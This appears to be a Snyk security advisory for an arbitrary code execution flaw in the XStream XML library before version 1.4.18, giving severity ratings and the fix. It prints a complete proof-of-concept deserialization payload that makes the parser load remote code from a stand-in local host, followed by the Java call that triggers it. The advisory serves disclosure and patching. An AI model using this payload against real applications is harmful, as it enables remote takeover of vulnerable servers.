Arbitrary Code Execution Affecting com.thoughtworks.xstream:xstream Open this link in a new tab package, versions [,1.4.18)


0.0
high
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    High

  • Scope

    Changed

  • Confidentiality

    High

  • Integrity

    High

  • Availability

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569179

  • published

    24 Aug 2021

  • disclosed

    24 Aug 2021

  • credit

    Smi1e

How to fix?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<javax.swing.event.EventListenerList serialization='custom'>
  <javax.swing.event.EventListenerList>
    <default>
      <listenerList>
        <javax.swing.undo.UndoManager>
          <hasBeenDone>true</hasBeenDone>
          <alive>true</alive>
          <inProgress>true</inProgress>
          <edits>
            <com.sun.xml.internal.ws.api.message.Packet>
              <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                <parsedMessage>true</parsedMessage>
                <soapVersion>SOAP_11</soapVersion>
                <bodyParts/>
                <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                  <attachmentsInitialized>false</attachmentsInitialized>
                  <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
                    <soapPart/>
                    <mm>
                      <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                        <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
                          <cleaned>false</cleaned>
                          <entries>
                            <com.sun.jndi.ldap.LdapEntry>
                              <DN>cn=four,cn=three,cn=two,cn=one</DN>
                              <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
                                <javax.naming.directory.BasicAttribute>
                                  <default>
                                    <ignoreCase>false</ignoreCase>
                                  </default>
                                  <int>4</int>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>objectClass</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>javanamingreference</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default>
                                        <rdn class='com.sun.jndi.ldap.LdapName' serialization='custom'>
                                          <com.sun.jndi.ldap.LdapName>
                                            <string>cn=four,cn=three,cn=two,cn=one</string>
                                            <boolean>false</boolean>
                                          </com.sun.jndi.ldap.LdapName>
                                        </rdn>
                                      </default>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaCodeBase</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>http://127.0.0.1:8080/</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaClassName</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>refObj</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaFactory</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>ExecTemplateJDK7</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                </javax.naming.directory.BasicAttribute>
                              </attributes>
                            </com.sun.jndi.ldap.LdapEntry>
                          </entries>
                          <limit>2</limit>
                          <posn>0</posn>
                          <homeCtx/>
                          <more>true</more>
                          <hasMoreCalled>true</hasMoreCalled>
                        </aliases>
                      </it>
                    </mm>
                  </multiPart>
                </sm>
              </message>
            </com.sun.xml.internal.ws.api.message.Packet>
          </edits>
          <indexOfNextAdd>0</indexOfNextAdd>
          <limit>100</limit>
        </javax.swing.undo.UndoManager>
      </listenerList>
    </default>
    <string>java.lang.InternalError</string>
    <javax.swing.undo.UndoManager reference='../default/listenerList/javax.swing.undo.UndoManager'/>
    <null/>
  </javax.swing.event.EventListenerList>
</javax.swing.event.EventListenerList>
XStream xstream = new XStream();
xstream.fromXML(xml);